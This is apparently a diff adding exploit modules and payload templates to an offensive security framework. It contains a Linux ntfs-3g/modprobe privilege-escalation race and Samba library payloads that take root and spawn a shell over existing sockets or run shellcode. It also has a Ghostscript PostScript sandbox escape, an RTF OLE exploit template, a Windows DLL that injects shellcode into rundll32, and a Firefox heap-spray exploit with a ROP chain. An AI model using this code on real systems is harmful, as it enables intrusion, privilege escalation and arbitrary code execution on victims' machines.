+    pid_t fd_stasher_child = fork();
+    if (fd_stasher_child == -1)
+      err(1, "fork (for eventfd holder)");
+    if (fd_stasher_child == 0) {
+      prctl(PR_SET_PDEATHSIG, SIGKILL);
+      // close PR_SET_PDEATHSIG race window
+      if (getppid() != child) raise(SIGKILL);
+      while (1) pause();
+    }
+    for (int i = 0; i < n_open_files; i++)
+      close(open_files[i]);
+    if (reached_limit)
+      break;
+  }
+
+  // Wake up ntfs-3g and keep allocating files, then free up
+  // the files as soon as we're reasonably certain that either
+  // modprobe was spawned or the attack failed.
+  if (kill(getppid(), SIGCONT))
+    err(1, "SIGCONT");
+
+  time_t start_time = time(NULL);
+  while (1) {
+    for (int i=0; i<1000; i++) {
+      int efd = eventfd(0, 0);
+      if (efd == -1 && errno != ENFILE)
+        err(1, "gapfiller eventfd() failed unexpectedly");
+    }
+    struct pollfd modprobe_poll_fds[1] = {{
+      .fd = modprobe_inotify_fd,
+      .events = POLLIN
+    }};
+    int modprobe_poll_res = poll(modprobe_poll_fds, 1, 0);
+    if (modprobe_poll_res == -1)
+      err(1, "poll");
+    if (modprobe_poll_res == 1) {
+      puts("yay, modprobe ran!");
+      exit(0);
+    }
+    if (time(NULL) > start_time + 3) {
+      puts("modprobe didn't run?");
+      exit(1);
+    }
+  }
+}
@@ -0,0 +1,48 @@
+#!/bin/bash
+
+build () {
+  CC=$1
+  TARGET_SUFFIX=$2
+  CFLAGS=$3
+
+  echo "[*] Building for ${TARGET_SUFFIX}..."
+  for type in {shellcode,system,findsock}
+   do ${CC} ${CFLAGS} -Wall -Werror -fPIC -fno-stack-protector samba-root-${type}.c -shared -o samba-root-${type}-${TARGET_SUFFIX}.so
+  done
+}
+
+rm -f *.o *.so *.gz
+
+#
+# Linux GLIBC
+#
+
+# x86
+build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
+build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
+
+# ARM
+build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
+build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
+build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
+
+# MIPS
+build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
+build "mipsel-linux-gnu-gcc-5"  "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
+build "mips64-linux-gnuabi64-gcc-5"  "linux-glibc-mips64" "-D OLD_LIB_SET_1"
+build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
+
+# SPARC
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
+
+# PowerPC
+build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
+build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
+build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
+
+# S390X
+build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
+
+gzip -9 *.so
+rm -f *.o *.so
@@ -0,0 +1,21 @@
+#!/bin/bash
+
+# Assume x86_64 Ubuntu 16.04 base system
+apt-get install build-essential \
+  gcc-5-multilib \
+  gcc-5-multilib-arm-linux-gnueabi \
+  gcc-5-multilib-arm-linux-gnueabihf \
+  gcc-5-multilib-mips-linux-gnu \
+  gcc-5-multilib-mips64-linux-gnuabi64 \
+  gcc-5-multilib-mips64el-linux-gnuabi64 \
+  gcc-5-multilib-mipsel-linux-gnu \
+  gcc-5-multilib-powerpc-linux-gnu \
+  gcc-5-multilib-powerpc64-linux-gnu \
+  gcc-5-multilib-s390x-linux-gnu \
+  gcc-5-multilib-sparc64-linux-gnu \
+  gcc-4.9-powerpc64le-linux-gnu \
+  gcc-4.9-aarch64-linux-gnu
+
+if [ ! -e /usr/include/asm ];
+  then ln -sf /usr/include/asm-generic /usr/include/asm
+fi
@@ -0,0 +1,67 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <signal.h>
+#include <string.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver execve,execve@GLIBC_2.0");
+__asm__(".symver dup2,dup2@GLIBC_2.0");
+__asm__(".symver getsockname,getsockname@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver execve,execve@GLIBC_2.2.5");
+__asm__(".symver dup2,dup2@GLIBC_2.2.5");
+__asm__(".symver getsockname,getsockname@GLIBC_2.2.5");
+#endif
+
+extern bool change_to_root_user(void);
+
+// Samba 4 looks for samba_init_module
+int samba_init_module(void)
+{
+  char *args[2] = {"/bin/sh", 0};
+  struct sockaddr_in sa;
+  socklen_t sl = sizeof(sa);
+  int s;
+  unsigned char buff[] = {
+    0x00, 0x00, 0x00, 0x23, 0xff, 0x53, 0x4d, 0x42,
+    0xa2, 0x39, 0x00, 0x00, 0xc0, 0x88, 0x03, 0xc8,
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+    0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x64, 0x7e,
+    0x64, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x00
+  };
+
+  change_to_root_user();
+
+  for (s=4096; s>0; s--) {
+
+    // Skip over invalid sockets
+    if (getsockname(s, (struct sockaddr *)&sa, &sl) != 0)
+      continue;
+
+    // Skip over non internet sockets
+    if (sa.sin_family != AF_INET)
+      continue;
+
+    // Send a semi-valid SMB response to simplify things
+    send(s, buff, sizeof(buff), 0);
+
+    // Duplicate standard input/output/error
+    dup2(s, 0);
+    dup2(s, 1);
+    dup2(s, 2);
+
+    execve(args[0], args, NULL);
+  }
+
+  return 0;
+}
+
+// Samba 3 looks for init_samba_module
+int init_samba_module(void) {  return samba_init_module(); }
@@ -0,0 +1,47 @@
+#include <stdio.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <signal.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver mmap,mmap@GLIBC_2.0");
+__asm__(".symver memcpy,memcpy@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver mmap,mmap@GLIBC_2.2.5");
+__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 10000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+extern bool change_to_root_user(void);
+
+// Samba 4 looks for samba_init_module
+int samba_init_module(void)
+{
+  void *mem;
+  void (*fn)();
+
+  change_to_root_user();
+  mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
+  if (mem == MAP_FAILED)
+    return 0;
+
+  memcpy(mem, payload, PAYLOAD_SIZE);
+  fn = (void(*)())mem;
+
+  if (! fork()) {
+    fn();
+    kill(getpid(), 9);
+  }
+  return 0;
+}
+
+// Samba 3 looks for init_samba_module
+int init_samba_module(void) {  return samba_init_module(); }
@@ -0,0 +1,34 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 10000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+extern bool change_to_root_user(void);
+
+// Samba 4 looks for samba_init_module
+int samba_init_module(void)
+{
+  change_to_root_user();
+  if (! fork()) {
+    system((const char*)payload);
+  }
+  return 0;
+}
+
+// Samba 3 looks for init_samba_module
+int init_samba_module(void) {  return samba_init_module(); }
@@ -0,0 +1,101 @@
+%!PS-Adobe-3.0 EPSF-3.0
+%%BoundingBox: -0 -0 100 100
+
+
+/size_from  10000      def
+/size_step    500      def
+/size_to   65000      def
+/enlarge    1000      def
+
+%/bigarr 65000 array def
+
+0
+size_from size_step size_to {
+    pop
+    1 add
+} for
+
+/buffercount exch def
+
+/buffersizes buffercount array def
+
+
+0
+size_from size_step size_to {
+    buffersizes exch 2 index exch put
+    1 add
+} for
+pop
+
+/buffers buffercount array def
+
+0 1 buffercount 1 sub {
+    /ind exch def
+    buffersizes ind get /cursize exch def
+    cursize string /curbuf exch def
+    buffers ind curbuf put
+    cursize 16 sub 1 cursize 1 sub {
+        curbuf exch 255 put
+    } for
+} for
+
+
+/buffersearchvars [0 0 0 0 0] def
+/sdevice [0] def
+
+enlarge array aload
+
+{
+    .eqproc
+    buffersearchvars 0 buffersearchvars 0 get 1 add put
+    buffersearchvars 1 0 put
+    buffersearchvars 2 0 put
+    buffercount {
+        buffers buffersearchvars 1 get get
+        buffersizes buffersearchvars 1 get get
+        16 sub get
+        254 le {
+            buffersearchvars 2 1 put
+            buffersearchvars 3 buffers buffersearchvars 1 get get put
+            buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
+        } if
+        buffersearchvars 1 buffersearchvars 1 get 1 add put
+    } repeat
+
+    buffersearchvars 2 get 1 ge {
+        exit
+    } if
+    %(.) print
+} loop
+
+.eqproc
+.eqproc
+.eqproc
+sdevice 0
+currentdevice
+buffersearchvars 3 get buffersearchvars 4 get 16#7e put
+buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
+buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
+put
+
+
+buffersearchvars 0 get array aload
+
+sdevice 0 get
+16#3e8 0 put
+
+sdevice 0 get
+16#3b0 0 put
+
+sdevice 0 get
+16#3f0 0 put
+
+
+currentdevice null false mark /OutputFile (%pipe%echo vulnerable > /dev/tty)
+.putdeviceparams
+1 true .outputpage
+.rsdparams
+%{ } loop
+0 0 .quit
+%asdf
+
@@ -0,0 +1,33 @@
+{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0
+{\info
+{\author Microsoft}
+{\operator Microsoft}
+}
+{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}
+{
+{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101
+{\*\objclass Word.Document.8}
+{\*\objdata 0105000002000000
+090000004f4c45324c696e6b000000000000000000000a0000
+d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d
+6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
+000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
+0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
+00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+MINISTREAM_DATA
+0105000000000000}
+{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}
+{\*\datastore }
+}
@@ -0,0 +1,16 @@
+#!/bin/sh
+rm -f *.o *.dll
+
+CCx86="i686-w64-mingw32"
+CCx64="x86_64-w64-mingw32"
+
+${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
+${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
+${CCx64}-strip -s temp.dll -o template_x64_windows.dll
+rm -f temp.dll *.o
+
+${CCx86}-gcc -c -Os template.c -Wall -shared
+${CCx86}-dllwrap --def template.def *.o -o temp.dll
+${CCx86}-strip -s temp.dll -o template_x86_windows.dll
+rm -f temp.dll *.o
+
@@ -0,0 +1,95 @@
+// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll
+// - removed ExitThread(0) to prevent an Explorer crash
+// - added Mutex to prevent invoking payload multiple times (at least try)
+#include <windows.h>
+#include "template.h"
+
+void inline_bzero(void *p, size_t l)
+{
+	BYTE *q = (BYTE *)p;
+	size_t x = 0;
+	for (x = 0; x < l; x++)
+		*(q++) = 0x00;
+}
+
+void ExecutePayload(void);
+
+BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
+{
+	switch (dwReason)
+	{
+	case DLL_PROCESS_ATTACH:
+		ExecutePayload();
+		break;
+
+        case DLL_PROCESS_DETACH:
+		break;
+
+        case DLL_THREAD_ATTACH:
+		break;
+
+        case DLL_THREAD_DETACH:
+		break;
+	}
+
+	return TRUE;
+}
+
+void ExecutePayload(void)
+{
+	PROCESS_INFORMATION pi;
+	STARTUPINFO si;
+	CONTEXT ctx;
+	LPVOID ep;
+	HANDLE hMutex;
+	SECURITY_ATTRIBUTES MutexAttributes;
+
+	inline_bzero(&MutexAttributes, sizeof(MutexAttributes));
+	MutexAttributes.nLength = sizeof(MutexAttributes);
+	MutexAttributes.bInheritHandle = TRUE; // inherit the handle
+	hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex");
+	if(hMutex == NULL)
+	{
+		return;
+	}
+
+	if(GetLastError() == ERROR_ALREADY_EXISTS)
+	{
+		CloseHandle(hMutex);
+		return;
+	}
+
+	if(GetLastError() == ERROR_ACCESS_DENIED)
+	{
+		CloseHandle(hMutex);
+		return;
+	}
+
+	// Start up the payload in a new process
+	inline_bzero(&si, sizeof(si));
+	si.cb = sizeof(si);
+
+	// Create a suspended process, write shellcode into stack, make stack RWX, resume it
+	if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
+		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
+		GetThreadContext(pi.hThread, &ctx);
+
+		ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+		WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
+
+#ifdef _WIN64
+		ctx.Rip = (DWORD64)ep;
+#else
+		ctx.Eip = (DWORD)ep;
+#endif
+
+		SetThreadContext(pi.hThread, &ctx);
+		ResumeThread(pi.hThread);
+
+		CloseHandle(pi.hThread);
+		CloseHandle(pi.hProcess);
+	}
+
+	CloseHandle(hMutex);
+}
+
@@ -0,0 +1,3 @@
+EXPORTS
+DllMain@12
+
@@ -0,0 +1,3 @@
+#define SCSIZE 2048
+unsigned char code[SCSIZE] = "PAYLOAD:";
+
@@ -0,0 +1,18 @@
+
+LANGUAGE 9, 1
+
+
+VS_VERSION_INFO VERSIONINFO
+ FILEVERSION 0,0,0,1
+ PRODUCTVERSION 0,0,0,1
+ FILEFLAGSMASK 0x17L
+ FILEFLAGS 0x0L
+ FILEOS 0x4L
+ FILETYPE 0x2L
+ FILESUBTYPE 0x0L
+BEGIN
+
+END
+
+#define RT_HTML  23
+
@@ -0,0 +1 @@
+<html><body bgcolor="#2F3236"><center><div><iframe width="1280" height="720" src="https://www.youtube.com/embed/wArxEk0Rxhc?autoplay=1" frameborder="0" allowfullscreen></iframe></div></center></body></html>
@@ -0,0 +1,362 @@
+var window = self;
+
+  function Memory(b,a,f) 
+  { 
+      this._base_addr=b; 
+      this._read=a; 
+      this._write=f; 
+      this._abs_read = function(a) { 
+          a >= this._base_addr ? a = this._read( a - this._base_addr) : ( a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) );
+          return 0>a?4294967295+a+1:a
+          
+      };
+      this._abs_write = function(a,b) {
+          a >= this._base_addr ? this._write(a - this._base_addr, b) : ( a = 4294967295 - this._base_addr + 1 + a, this._write(a,b) )
+      };
+      this.readByte = function(a) { 
+          return this.read(a) & 255
+          
+      };
+      this.readWord = function(a) {
+          return this.read(a) & 65535
+      };
+      this.readDword = function(a){ return this.read(a) };
+      this.read = function(a,b) { 
+          if (a%4) {
+              var c = this._abs_read( a & 4294967292),
+                  d = this._abs_read( a+4 & 4294967292),
+                  e = a%4;
+              return c>>>8*e | d<<8*(4-e)
+          }
+          return this._abs_read(a)
+      };
+      this.readStr = function(a) { 
+          for(var b = "", c = 0;;) {
+              if (32 == c)
+                  return "";
+              var d = this.readByte(a+c);
+              if(0 == d)
+                  break;
+              b += String.fromCharCode(d);
+              c++
+          }
+          return b
+          
+      };
+      this.write = function(a){}
+  }
+
+  function PE(b,a) { 
+      this.mem = b;
+      this.export_table = this.module_base = void 0;
+      this.export_table_size = 0;
+      this.import_table = void 0;
+      this.import_table_size = 0;
+      this.find_module_base = function(a) { 
+          for(a &= 4294901760; a; ) { 
+              if(0x5a4d == this.mem.readWord(a))
+                  return this.module_base=a;
+              a -= 65536
+          }
+      };
+      this._resolve_pe_structures = function() { 
+          peFile = this.module_base + this.mem.readWord(this.module_base+60);
+          if(0x4550 != this.mem.readDword(peFile))
+              throw "Bad NT Signature";
+
+          this.pe_file = peFile;
+          this.optional_header = this.pe_file+36;
+          this.export_directory = this.module_base+this.mem.readDword(this.pe_file+120);
+          this.export_directory_size = this.mem.readDword(this.pe_file+124);
+          this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);
+          this.import_directory_size=this.mem.readDword(this.pe_file+132)};
+          this.resolve_imported_function=function(a,b){
+              void 0==this.import_directory&&this._resolve_pe_structures();
+              for(var e=this.import_directory,c=e+this.import_directory_size;e<c;){
+                  var d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);
+                  if(a.toUpperCase()==d.toUpperCase()){
+                      for(var c = this.mem.readDword(e) + this.module_base,
+                              e = this.mem.readDword(e+16) + this.module_base, 
+                              d = this.mem.readDword(c), 
+                              f = 0 ; 0 !=d ; )
+                      {
+                          if(this.mem.readStr(d+this.module_base+2).toUpperCase() == b.toUpperCase())
+                              return this.mem.readDword(e+4*f);
+                          f++;
+                          d = this.mem.readDword(c+4*f)
+                      }
+                      break
+                  }
+                  e+=20
+              }
+              return 0
+          };
+          void 0!=a && this.find_module_base(a)
+      }
+
+    function ROP(mem,a){
+       this.mem = mem;
+       this.pe = new PE(mem,a);
+       this.pe._resolve_pe_structures();
+       this.module_base = this.pe.module_base + 0x1000;
+       
+       this.findSequence = function(seq) { 
+          for(var b=0;;) { 
+              for(var e=0,c=0;c<seq.length;c++)
+                  if(this.mem.readByte(this.module_base+b+c)==seq[c]&&e==c)
+                      e++;
+                  else 
+                      break;
+              if(e==seq.length)
+                  return this.module_base+b;
+              b++
+            
+       }
+        
+   };
+   this.findStackPivot=function() {
+       return this.findSequence([0x94, 0xc3])
+      
+   };
+   this.findPopRet=function(a) { 
+       return this.findSequence([0x58, 0xc3])
+      
+   };
+   this.ropChain=function(base, vtOffset, array = undefined) { 
+       var buf = undefined
+       if (array != undefined)
+        buf = array
+      else
+        buf = new ArrayBuffer(0x1000)
+       ropBuff = new Uint32Array(buf);
+       var stackPivot = this.findStackPivot(),
+           popRet = this.findPopRet("EAX"),
+           virtualAllocAddr = this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");
+
+       ropBuff[0]= popRet+1;
+       ropBuff[1]= popRet;
+       ropBuff[2]= base+vtOffset+4;
+       ropBuff[3]= stackPivot;
+       ropBuff[vtOffset>>2] = stackPivot;
+
+       offset = (vtOffset+4>>2);
+       ropBuff[offset++]=virtualAllocAddr;
+       ropBuff[offset++]=base+(vtOffset+0x1c);
+       ropBuff[offset++]=base;
+       ropBuff[offset++]=0x1000;
+       ropBuff[offset++]=0x1000;
+       ropBuff[offset++]=0x40;
+       ropBuff[offset++]=0xcccccccc;
+       
+       return ropBuff;
+   }
+}
+
+var conv=new ArrayBuffer(8)
+var convf64=new Float64Array(conv)
+var convu32=new Uint32Array(conv)
+
+var qword2Double=function(b,a) { 
+  convu32[0]=b;
+  convu32[1]=a;
+  return convf64[0]
+}
+
+var doubleFromFloat = function(b,a) { 
+  convf64[0]=b;
+  return convu32[a]
+}
+
+var sprayArrays=function() {
+  var mArray = new Array(0x1fffe)  
+  var arrBuf = new ArrayBuffer(0x100000);
+  var dwArray =  new Uint32Array(arrBuf)
+  var qwArray = new Float64Array(arrBuf, 0x10)
+
+
+  for (var i = 0; i < 0x1fffe; i++)
+    mArray[i] = qword2Double(0, 0);
+  
+   mArray[2]     = qword2Double(arrBase + 0xaf0, 0)
+   mArray[0xe]   = qword2Double(arrBase +  0x08, 0)
+   mArray[0x15]  = qword2Double(0, 0x02)
+   mArray[0x21]  = qword2Double(0x02, 0)
+   mArray[0x22]  = qword2Double(arrBase + 0x2f0, arrBase + 0x1f0)
+   mArray[0x3e]  = qword2Double(0, arrBase + 0x3f0)
+   mArray[0x5e]  = qword2Double(arrBase + 0x4f0, 0)
+   mArray[0x80]  = qword2Double(0x02, 0)
+   mArray[0x9f]  = qword2Double(arrBase + 0x500,0)
+   mArray[0xa0]  = qword2Double(0, 0xf0000000)
+   mArray[0xa2]  = qword2Double(0, 0xbff00000)
+   mArray[0xa4]  = qword2Double(0x02, 0)
+   mArray[0xa5]  = qword2Double(0x01, 0)
+   mArray[0xaa]  = qword2Double(0, arrBase + 0x5f0)
+   mArray[0xac]  = qword2Double(arrBase + 0x6f0, arrBase + 0x700)
+   mArray[0xb3]  = qword2Double(0, 0x02)
+   mArray[0xb4]  = qword2Double(0, 0)
+   mArray[0xde]  = qword2Double(arrBase + 0x7f0, 0)
+   mArray[0xfe]  = qword2Double(0x01, 0);
+   mArray[0xff]  = qword2Double(0, 0x10000000)
+   mArray[0x15e] = qword2Double(0x07, 0)
+   mArray[0x15f] = qword2Double(arrBase + 0xf0, arrBase - 0x10 + 0x05)
+   mArray[0x160] = qword2Double(arrBase - 0x07, arrBase - 0x10 + 0x0d)
+   mArray[0x161] = qword2Double(arrBase + 0x10000b, arrBase + 0x100007)
+   mArray[0x162] = qword2Double(arrBase + 0x100003, 0)
+   mArray[0x202] = qword2Double(arrBase + 0x1af0, 0)
+   mArray[0x20e] = qword2Double(arrBase + 0x1008, 0)
+   mArray[0x215] = qword2Double(0, 0x02)
+   mArray[0x221] = qword2Double(0x02, 0)
+   mArray[0x222] = qword2Double(arrBase + 0x12f0, arrBase + 0x11f0)
+   mArray[0x23e] = qword2Double(0, arrBase + 0x13f0)
+   mArray[0x25e] = qword2Double(arrBase + 0x14f0, 0)
+   mArray[0x280] = qword2Double(0x02, 0)
+   mArray[0x29f] = qword2Double(arrBase + 0x1500,0)
+   mArray[0x2a0] = qword2Double(0, 0xf0000000)
+   mArray[0x2a2] = qword2Double(0, 0xbff00000)
+   mArray[0x2a4] = qword2Double(0x02, 0)
+   mArray[0x2a5] = qword2Double(0x01, 0)
+   mArray[0x2aa] = qword2Double(0, arrBase + 0x15f0)
+   mArray[0x2ac] = qword2Double(arrBase + 0x16f0, arrBase + 0x1700)
+   mArray[0x2b3] = qword2Double(0, 0x02)
+   mArray[0x2b4] = qword2Double(0, 0x00)
+   mArray[0x2de] = qword2Double(arrBase + 0x17f0, 0)
+   mArray[0x2fe] = qword2Double(0x01, 0)
+   mArray[0x2ff] = qword2Double(0, 0x10000000)
+
+  var i = mArray.length;
+  while(i--) {qwArray[i] = mArray[i];}
+
+  for (var i = 0; i < spr.length; i += 2)
+  {
+    spr[i] = mArray.slice(0)
+    spr[i + 1] = arrBuf.slice(0)
+  }
+}
+
+var spr = new Array(400)
+var arrBase = 0x22100010;
+
+// insert codes here   \/ ------
+Shellcode = unescape("INSERTSHELLCODEHEREPLZ");
+
+if (Shellcode.length % 2 != 0)
+  Shellcode += "NOPSGOHERE";
+
+sprayArrays();
+postMessage(arrBase)
+
+
+var len = spr[0].length;
+var mArray = undefined;
+var dwArray = undefined;
+var qwArray = undefined;
+var container = undefined;
+
+while (mArray == undefined)
+{
+  for (var i = 0; i < spr.length; i += 2)
+  {
+    if (spr[i].length != len)
+    {
+      container = dwArray = new Uint32Array(spr[i + 1])
+      qwArray = new Float64Array(spr[i + 1], 0x10)
+      if (dwArray[1] == 0)
+      {
+        dwArray = new Uint32Array(spr[i - 1])
+        dwArray[0] = dwArray[1] = dwArray[2] = dwArray[3] = 0xdea110c8;
+        qwArray = new Float64Array(spr[i - 1], 0x10)
+      }
+      mArray = spr[i];
+      break;
+    }
+  }
+}
+
+var off = 0x100000;
+if (dwArray != container)
+  off = off * 2;
+
+var memory = new Uint32Array(0x10);
+var len = memory.length;
+mArray[0x20000] = memory;
+ropArrBuf = new ArrayBuffer(0x1000)
+mArray[0x20001] = ropArrBuf;
+ropArrBufPtr = container[0x6]
+
+targetAddr = container[4] + 0x1b;
+var arrayBase = container[4] + 0x30;
+
+mArray[0x20000] = undefined;
+mArray[0x20001] = undefined;
+
+var n = 0x40;
+qwArray[0x35e] = mArray[0x35e] = qword2Double(n + 1, 0)
+qwArray[0x35f] = mArray[0x35f] = qword2Double(arrBase - 0x10 + 0x1100, targetAddr)
+for (var i = 0; i < (n/2); i++)
+  qwArray[0x360 + i] = mArray[0x360 + i] = qword2Double(targetAddr, targetAddr)
+
+container[0] = container[1] = container[2] = container[3] = 0xffffff81;
+qwArray[0x1e] = mArray[0x1e] = qword2Double(0xdea110c8, 0)
+qwArray[0xfe] = mArray[0xfe] = qword2Double(2, 0)
+qwArray[0xb3] = mArray[0xb3] = qword2Double(0, 3)
+qwArray[0xa9] = mArray[0xa9] = qword2Double(0, 2)
+
+while (memory.length == len) {}
+
+
+var mem = new Memory(arrayBase, 
+                    function(b) { return memory[b/4]; }, 
+                    function(b,a) { memory[b/4] = a;  });
+
+var ptr = targetAddr - 0x1b;
+var xulPtr = mem.readDword(ptr + 0xc);
+var rop = new ROP(mem, xulPtr);
+var ropBase = mem.readDword(ropArrBufPtr + 0x10);
+rop.ropChain(ropBase, 0x130, ropArrBuf);
